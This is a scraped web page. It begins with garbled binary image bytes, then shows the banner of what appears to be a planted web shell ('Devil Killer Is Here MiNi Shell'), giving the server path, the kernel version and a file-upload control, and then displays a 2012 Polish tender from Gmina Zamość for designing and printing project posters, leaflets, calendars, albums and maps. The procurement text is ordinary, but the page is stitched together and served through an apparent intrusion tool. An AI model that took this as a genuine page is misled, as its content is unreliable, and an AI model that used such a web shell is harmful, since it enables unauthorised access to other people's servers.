JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120730/276716-N-2012.html

<p class="kh_header"><b>Zamość: Opracowanie graficzne i druk publikacji  w ramach projektu  Rozwój i współpraca pierścieniowych gmin Polski Wschodniej</b><br>
<b>Numer ogłoszenia: 276716 - 2012; data zamieszczenia: 30.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zamość , ul. Peowiaków 92, 22-400 Zamość, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.mbnet.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie graficzne i druk publikacji  w ramach projektu  Rozwój i współpraca pierścieniowych gmin Polski Wschodniej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia stanowi opracowanie graficzne i druk publikacji  w ramach projektu Rozwój i współpraca pierścieniowych gmin Polski Wschodniej.

1.Plakaty 

Przedmiotem Zamówienia jest opracowanie i wykonanie plakatu promującego projekt Rozwój i współpraca pierścieniowych gmin Polski Wschodniej.
Przedmiotem Zamówienia będzie: opracowanie graficzne, skład i druk plakatu.
- wydruk w pełnym kolorze, 
- nakład: 80 sztuk
- format: A3 
- papier: kreda 150 g, 

Wykonawca zaprojektuje plakat i wydrukuje oraz dostarczy Zamawiającemu.
W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Zamawiającym konsultacji w zakresie opracowania graficznego i składu oraz uzyskania akceptacji ostatecznej wersji plakatu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Wykonawca przekaże Zamawiającemu ostateczną wersję plakatu zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawcy będzie zobowiązany do spakowania plakatów w 4 paczki po 20 szt. oraz dostarczenie do Zamawiającego na adres: Gmina Zamość, ul. Peowiaków 92, 22-400 Zamość.
Termin realizacji: do 01 października 2012 r. lub w terminie 14 dni od dnia podpisania umowy w przypadku podpisania umowy z wykonawcą w terminie po: 17 września 2012r.

2.Ulotki: 

Przedmiotem Zamówienia jest opracowanie i wykonanie ulotki informacyjno-promocyjnej dla projektu pt: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej.
Przedmiotem Zamówienia będzie: opracowanie graficzne, skład i druk ulotki .
- wydruk w pełnym kolorze, dwustronny 
- nakład: 2000 sztuk
- format: A5 
- papier wchłaniający tusz -po którym można łatwo pisać

Wykonawca zaprojektuje ulotkę i wydrukuje.
W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Zamawiającym konsultacji w zakresie opracowania graficznego i składu oraz uzyskania akceptacji ostatecznej wersji ulotki (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Jedna strona ulotki druk w kolorze (znaki graficzne, tekst, zdjęcia) druga strona ulotki: czarno - biała w kratkę lub linie. Wykonawca przekaże Zamawiającemu ostateczną wersję ulotki zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawcy będzie zobowiązany do spakowania ulotek w 4 paczki po 500 sztuk oraz dostarczenie do Zamawiającego na adres: Gmina Zamość, ul. Peowiaków 92, 22-400 Zamość.

Termin realizacji: do 15 styczeń 2014 r.

3.Kalendarz

Przedmiotem Zamówienia jest opracowanie i wykonanie wspólnego kalendarza na 2013 rok w ramach projektu pt: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej.
Przedmiotem Zamówienia będzie: opracowanie graficzne, skład i druk kalendarza ściennego pt: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej
- wydruk w pełnym kolorze, druk dwustronny 
- nakład: 3150 egzemplarzy,
- format: A2.
- liczba stron: 7 kart (1 karta ogólna + 6 kart z miesiącami) + podkładka 
- papier: kreda 200g, pełny kolor, druk dwustronny
- oprawa spirala po krótszym boku 
Zdjęcia do kalendarza przekaże Wykonawcy Zamawiający. Wykonawca będzie zobowiązany do zaprojektowania graficznego kalendarza korzystając z dostarczonych materiałów oraz przedstawieniu propozycji graficznej kalendarza Zamawiającemu.
Każda karta dla danego miesiąca ma zawierać zdjęcie z jednej gminy plus rozkład dni miesiąca z zaznaczonymi dniami tygodnia. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Zamawiającym konsultacji w zakresie opracowania graficznego i składu oraz uzyskania akceptacji ostatecznej wersji kalendarza (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Wykonawca przekaże Zamawiającemu ostateczną wersję wydawnictwa zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawcy będzie zobowiązany do spakowania kalendarza w paczki po 10-25 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie kalendarzy do: 
- Gminy Ełk, ul. Armii Krajowej 3, 19-300 Ełk w ilości 350 egzemplarzy
- Gminy Sanok, ul. Kościuszki 23, 38-500 Sanok w ilości 1.000 egzemplarzy
- Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki w ilości 300 egzemplarzy
- Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość, w ilości 1.500 egzemplarzy

Termin realizacji: do 31 październik 2012 r.


4.Folder na temat rozwoju gospodarczego

Przedmiotem Zamówienia jest opracowanie i wykonanie wspólnego folderu informacyjno -promocyjnego na temat rozwoju gospodarczego partnerów projektu pt: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej. 

Zadanie to obejmuje opracowanie graficzne i wykonanie (skład i druk) wspólnego folderu na temat rozwoju gospodarczego.

Folder będzie zawierał zdjęcia i teksty oraz elementy graficzne.
- wydruk w pełnym kolorze, druk dwustronny 
- nakład: 8300 egzemplarzy
- format: A4 pionowo,
- liczba stron: 60 plus twarda sztywna okładka 
- papier: kreda 150g-m2, 
- oprawa szyta nicią, twarda foliowana, papier kreda błyszcząca, co najmniej 300g,
- grzbiet prosty
- album szyty nicią,
- dwie wklejki drukowane w kolorze,

Zdjęcia i teksty przekaże Wykonawcy Zamawiający. Wykonawca będzie zobowiązany do opracowania graficznego otrzymanych zdjęć i informacji składu i wydruku. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Zamawiającym konsultacji w zakresie opracowania graficznego i składu wydawnictwa oraz uzyskania akceptacji ostatecznej wersji folderu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Zamawiający ma prawo do ingerencji w opracowanie folderu i wprowadzenie własnych poprawek. 
Wykonawca przekaże Zamawiającemu ostateczną wersję wydawnictwa zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu przed ostatecznym drukiem folderu czterech stron wydruku próbnego. Wykonawcy będzie zobowiązany do spakowania folderu w paczki po 10 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie folderów do
- Gminy Ełk, ul. Armii Krajowej 3, 19-300 Ełk w ilości 2.300 egzemplarzy
- Gminy Sanok, ul. Kościuszki 23, 38-500 Sanok w ilości 2.000 egzemplarzy
- Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki w ilości 1.000 egzemplarzy
- Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość, w ilości 3.000 egzemplarzy

Termin realizacji: do 15 lipiec 2013. 

5. Folder na temat dziedzictwa kulturowego.


Przedmiotem Zamówienia jest opracowanie i wykonanie wspólnego folderu informacyjno -promocyjnego na temat dziedzictwa kulturowego partnerów projektu pt: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej. 
 Zadanie to obejmuje opracowanie graficzne i wykonanie (skład i druk) wspólnego folderu na temat dziedzictwa kulturowego.

Folder będzie zawierał zdjęcia i teksty oraz elementy graficzne.
- wydruk w pełnym kolorze, druk dwustronny,
- nakład: 21 000 egzemplarzy,
- format: A4 pionowo,
- liczba stron: 80 plus twarda sztywna okładka, 
- papier: kreda 150g-m2, 
- oprawa szyta nicią, twarda foliowana, papier kreda błyszcząca, co najmniej 300g,
- grzbiet prosty
- album szyty nicią,
- dwie wklejki drukowane w kolorze,
Zdjęcia i teksty przekaże Wykonawcy Zamawiający. Wykonawca będzie zobowiązany do opracowania graficznego otrzymanych zdjęć i informacji, składu i wydruku. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Zamawiającym konsultacji w zakresie opracowania graficznego i składu wydawnictwa oraz uzyskania akceptacji ostatecznej wersji folderu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Zamawiający ma prawo do ingerencji w opracowanie folderu i wprowadzenie własnych poprawek. Wykonawca przekaże Zamawiającemu ostateczną wersję wydawnictwa zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu przed ostatecznym drukiem folderu czterech stron wydruku próbnego. Wykonawcy będzie zobowiązany do spakowania folderu w paczki po 10 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie folderów do
- Gminy Ełk, ul. Armii Krajowej 3, 19-300 Ełk w ilości 6.000 egzemplarzy
- Gminy Sanok, ul. Kościuszki 23, 38-500 Sanok w ilości 5.000 egzemplarzy
- Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki w ilości 4.000 egzemplarzy
- Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość, w ilości 6.000 egzemplarzy

 Termin realizacji: do 10 kwiecień 2014. 

6.Folder z zakresu turystyki

Przedmiotem Zamówienia jest opracowanie i wykonanie wspólnego folderu z zakresu turystyki na temat rozwoju gospodarczego partnerów projektu pt: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej. 

Zadanie to obejmuje opracowanie graficzne i wykonanie (skład i druk) wspólnego folderu na temat rozwoju gospodarczego.

Folder będzie zawierał zdjęcia i teksty oraz elementy graficzne.
- wydruk w pełnym kolorze, druk dwustronny, 
- nakład: 28 000 egzemplarzy,
- format: A4 pionowo,
- liczba stron: 80 plus twarda sztywna okładka,
- papier: kreda 150g,
- oprawa szyta nicią, twarda foliowana, papier kreda błyszcząca, co najmniej 300g,
- grzbiet prosty
- album szyty nicią,
- dwie wklejki drukowane w kolorze,
Zdjęcia i teksty przekaże Wykonawcy Zamawiający. Wykonawca będzie zobowiązany do opracowania graficznego otrzymanych zdjęć i informacji, składu i wydruku. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Zamawiającym konsultacji w zakresie opracowania graficznego i składu wydawnictwa oraz uzyskania akceptacji ostatecznej wersji folderu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Zamawiający ma prawo do ingerencji w opracowanie folderu i wprowadzenie własnych poprawek. Wykonawca przekaże Zamawiającemu ostateczną wersję wydawnictwa zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu przed ostatecznym drukiem folderu czterech stron wydruku próbnego. Wykonawcy będzie zobowiązany do spakowania folderu w paczki po 10 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie folderów do
- Gminy Ełk, ul. Armii Krajowej 3, 19-300 Ełk w ilości 8.000 egzemplarzy
- Gminy Sanok, ul. Kościuszki 23, 38-500 Sanok w ilości 5.000 egzemplarzy
- Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki w ilości 5.000 egzemplarzy
- Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość, w ilości 10.000 egzemplarzy

Termin realizacji: 16 sierpień 2013

7.Album fotograficzny pt. Rozwój i współpraca pierścieniowych gmin Polski Wschodniej- Gmina Ełk

Przedmiotem Zamówienia jest opracowanie graficzne i wydruk albumu fotograficznego.
Album będzie zawierał zdjęcia i krótkie informacje z terenu Gminy Ełk.
- wydruk w pełnym kolorze, druk dwustronny 
- nakład: 3.100 egzemplarzy
- format: A4 pionowo,
- liczba stron: 80 plus twarda sztywna okładka 
- papier: kreda 170g, 
- oprawa szyta nicią, twarda foliowana, papier kreda błyszcząca, co najmniej 300g,
- grzbiet prosty
- album szyty nicią,
- dwie wklejki drukowane w kolorze,
Zdjęcia i teksty przekaże Wykonawcy Gmina Ełk za pośrednictwem Zamawiającego. Wykonawca będzie zobowiązany do opracowania graficznego otrzymanych zdjęć i informacji, składu i wydruku. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Gminą Ełk konsultacji w zakresie opracowania graficznego i składu wydawnictwa oraz uzyskania akceptacji ostatecznej wersji albumu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Zamawiający ma prawo do ingerencji w opracowanie folderu i wprowadzenie własnych poprawek. Wykonawca przekaże Zamawiającemu ostateczną wersję albumu zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu przed ostatecznym wydrukiem albumu czterech stron wydruku próbnego. 
Wykonawcy będzie zobowiązany do spakowania albumu w paczki po 10 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie albumu pod adres: Gmina Ełk, ul. Armii Krajowej 3, 19-300 Ełk 
Termin realizacji: do 31 maj 2013.   

8.Album fotograficzny pt. Rozwój i współpraca pierścieniowych gmin Polski Wschodniej - Gmina Sanok

Przedmiotem Zamówienia jest opracowanie graficzne i wydruk albumu fotograficznego.
Album będzie zawierał zdjęcia i krótkie informacje z terenu Gminy Sanok.
- wydruk w pełnym kolorze, druk dwustronny 
- nakład: 2.000 egzemplarzy
- format: A4 pionowo
- liczba stron: 80 plus twarda sztywna okładka 
- papier: kreda 170g, 
- oprawa szyta nicią, twarda foliowana, papier kreda błyszcząca, co najmniej 300g, 
- grzbiet prosty
- album szyty nicią,
- dwie wklejki drukowane w kolorze,
Zdjęcia i teksty przekaże Wykonawcy Gmina Sanok za pośrednictwem Zamawiającego. Wykonawca będzie zobowiązany do opracowania graficznego otrzymanych zdjęć i informacji, składu i wydruku. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Gminą Sanok konsultacji w zakresie opracowania graficznego i składu wydawnictwa oraz uzyskania akceptacji ostatecznej wersji albumu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Zamawiający ma prawo do ingerencji w opracowanie folderu i wprowadzenie własnych poprawek. Wykonawca przekaże Zamawiającemu ostateczną wersję albumu zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu przed ostatecznym wydrukiem albumu czterech stron wydruku próbnego. Wykonawcy będzie zobowiązany do spakowania albumu w paczki po 10 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie albumu pod adres: Gmina Sanok, ul. Kościuszki 23, 38-500 Sanok 

Termin realizacji: do 31 maj 2013. 

9.Album fotograficzny pt. Rozwój i współpraca pierścieniowych gmin Polski Wschodniej - Gmina Suwałki

Przedmiotem Zamówienia jest opracowanie graficzne i wydruk albumu fotograficznego.
Album będzie zawierał zdjęcia i krótkie informacje z terenu Gminy Suwałki.
- wydruk w pełnym kolorze, druk dwustronny 
- nakład: 3.000 egzemplarzy,
- format: A4 pionowo,
- liczba stron: 80 plus twarda sztywna okładka, 
- papier: kreda 170g, 
- oprawa szyta nicią, twarda foliowana, papier kreda błyszcząca, co najmniej 300g, 
- grzbiet prosty
- album szyty nicią,
- dwie wklejki drukowane w kolorze,
Zdjęcia i teksty przekaże Wykonawcy Gmina Suwałki za pośrednictwem Zamawiającego. Wykonawca będzie zobowiązany do opracowania graficznego otrzymanych zdjęć i informacji, składu i wydruku. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Gminą Sanok konsultacji w zakresie opracowania graficznego i składu wydawnictwa oraz uzyskania akceptacji ostatecznej wersji albumu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Zamawiający ma prawo do ingerencji w opracowanie folderu i wprowadzenie własnych poprawek. Wykonawca przekaże Zamawiającemu ostateczną wersję albumu zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu przed ostatecznym drukiem albumu czterech stron wydruku próbnego. Wykonawcy będzie zobowiązany do spakowania albumu w paczki po 10 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie albumu pod adres: Gmina Suwałki, ul. Kościuszki 71, 16-400 Suwałki

Termin realizacji: do 28 luty 2014. 





10.Album fotograficzny pt. Rozwój i współpraca pierścieniowych gmin Polski Wschodniej - Gmina Zamość
Przedmiotem Zamówienia jest opracowanie graficzne i wydruk albumu fotograficznego.
Album będzie zawierał zdjęcia i krótkie informacje z terenu Gminy Zamość.
- wydruk w pełnym kolorze, druk dwustronny 
- nakład: 3.000 egzemplarzy,
- format: A4 pionowo
- liczba stron: 80 plus twarda sztywna okładka, 
- papier: kreda 170g, 
- oprawa szyta nicią, twarda foliowana, papier kreda błyszcząca, co najmniej 300g, 
- grzbiet prosty
- album szyty nicią,
- dwie wklejki drukowane w kolorze,
Zdjęcia i teksty przekaże Wykonawcy Zamawiający. Wykonawca będzie zobowiązany do opracowania graficznego otrzymanych zdjęć i informacji składu i wydruku. W ramach zamówienia Wykonawca zobowiązany jest do przeprowadzenia z Zamawiającym konsultacji w zakresie opracowania graficznego i składu wydawnictwa oraz uzyskania akceptacji ostatecznej wersji albumu (w szczególności: styl szaty graficznej, rodzaj i rozmiar czcionki, kolorystyka itp.). Zamawiający ma prawo do ingerencji w opracowanie folderu i wprowadzenie własnych poprawek. Wykonawca przekaże Zamawiającemu ostateczną wersję albumu zapisaną w programie ogólnodostępnym na elektronicznym nośniku informacji (plik formatu otwartego). Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu przed ostatecznym drukiem albumu czterech stron wydruku próbnego. Wykonawcy będzie zobowiązany do spakowania albumu w paczki po 10 sztuk z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce oraz dostarczenie albumu do siedziby zamawiającego tj. Urząd Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość,

Termin realizacji: do 28 luty 2014.   

11.Mapa -Gmina Ełk
Przedmiotem zamówienia opracowanie i wykonanie mapy dla Gminy Ełk.
Mapa będzie zawierać: na awersie mapę Gminy Ełk, na rewersie informacje i zdjęcia z terenu gminy. 
- format A2,
- druk dwustronny, kolor 4+4
- papier: kreda 90 g, 
- obróbka introligatorska(mapa ma być składana),
- nakład: 7.000 egzemplarzy, 
Zamawiający przekaże wykonawcy mapę i wszelkie informacje tekstowe i zdjęcia w wersji elektronicznej. Wykonawca będzie zobowiązany do przygotowania graficznego mapy do wydruku. Po wydruku Wykonawca zobowiązany jest do spakowania map w paczki z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce i dostarczenia do siedziby Gminy Ełk, ul. Armii Krajowej 3, 19-300 Ełk.
Termin realizacji: 15 styczeń 2014r.

12.Mapa -Gmina Sanok:
Przedmiotem zamówienia opracowanie i wykonanie mapy dla Gminy Sanok.
Mapa będzie zawierać: na awersie mapę Gminy Sanok, na rewersie informacje i zdjęcia z terenu gminy
- format A2,
- druk dwustronny, kolor 4+4,
- papier: kreda 90 g,  
- obróbka introligatorska(mapa ma być składana),
- nakład: 5.000 egzemplarzy, 
Zamawiający przekaże wykonawcy mapę i wszelkie informacje tekstowe i zdjęcia w wersji elektronicznej. Wykonawca będzie zobowiązany do przygotowania graficznego mapy do wydruku. Po wydruku Wykonawca zobowiązany jest do spakowania map w paczki z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce i dostarczenia do siedziby Gminy Sanok, ul. Kościuszki 23, 38-500 Sanok.
Termin realizacji: 15 styczeń 2014r.

13.Mapa -Gmina Suwałki:
Przedmiotem zamówienia opracowanie i wykonanie mapy dla Gminy Suwałki.
Mapa będzie zawierać: na awersie mapę Gminy Suwałki, na rewersie informacje i zdjęcia z terenu gminy.
- format A2,
- druk dwustronny, kolor 4+4,
- papier: kreda 90 g,  
- obróbka introligatorska (mapa ma być składana),
- nakład: 5.000 egzemplarzy, 
Zamawiający przekaże wykonawcy mapę i wszelkie informacje tekstowe i zdjęcia w wersji elektronicznej. Wykonawca będzie zobowiązany do przygotowania graficznego mapy do wydruku. Po wydruku Wykonawca zobowiązany jest do spakowania map w paczki z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce i dostarczenia do siedziby Gminy Suwałki, ul. Kościuszki 71, 16-400 Suwałki 
Termin realizacji: 15 marzec 2013r.

14.Mapa -Gmina Zamość:
Przedmiotem zamówienia opracowanie i wykonanie mapy dla Gminy Zamość.
Mapa będzie zawierać: na awersie mapę Gminy Zamość, na rewersie informacje i zdjęcia z terenu gminy.
- format A2,
- druk dwustronny, kolor 4+4,
- papier: kreda 90 g,
- obróbka introligatorska(mapa ma być składana),
- nakład: 10.000 egzemplarzy, 
Zamawiający przekaże wykonawcy mapę i wszelkie informacje tekstowe i zdjęcia w wersji elektronicznej. Wykonawca będzie zobowiązany do przygotowania graficznego mapy do wydruku. Po wydruku Wykonawca zobowiązany jest do spakowania map w paczki z zaznaczeniem tytułu oraz ilości egzemplarzy w paczce i dostarczenia do siedziby Gminy Zamość, ul. Peowiaków 92, 22-400 Zamość. 
Termin realizacji: 15 marzec 2013r.

Informacje potrzebne do opracowania wydawnictw (zdjęcia + tekst + grafika) Zamawiający przekaże Wykonawcy niezwłocznie od momentu zebrania w/w informacji, ale nie później niż: 
-3 miesiące w przypadku folderów i albumów,
-2 miesiące w przypadku map, 
-1 miesiąc w przypadku plakatów, ulotek, kalendarza,
Wykonawca jest zobowiązany do systematycznego informowania Zamawiającego o postępie prac oraz do bieżącej konsultacji swoich propozycji odnośnie wizualizacji danego wydawnictwa. W przypadku albumów i folderów co najmniej 2 miesiące przed wydrukiem Wykonawca zobowiązany jest do przedstawienie projektu graficznego całego wydawnictwa i uzgodnienie ostatecznej wersji w terminie co najmniej 1 miesiąca przed terminem dostawy. Mapy,i plakaty, ulotki i kalendarze Wykonawca jest zobowiązany uzgadniać na bieżąco. Zamawiający nie dopuszcza nadawaniu numeru ISBN Wydawcy przez Wykonawcę.
Wszystkie publikacje muszą zostać oznaczone zgodnie z Zasadami promocji projektów dla Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013  Foldery, albumy, mapy i kalendarze muszą mieć oznaczenie: Publikacja bezpłatna.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>art.67 ust.1 pkt.6 ustawy pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.82.30.00-9, 79.82.00.00-8, 79.82.20.00-2, 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.04.2014.</p>

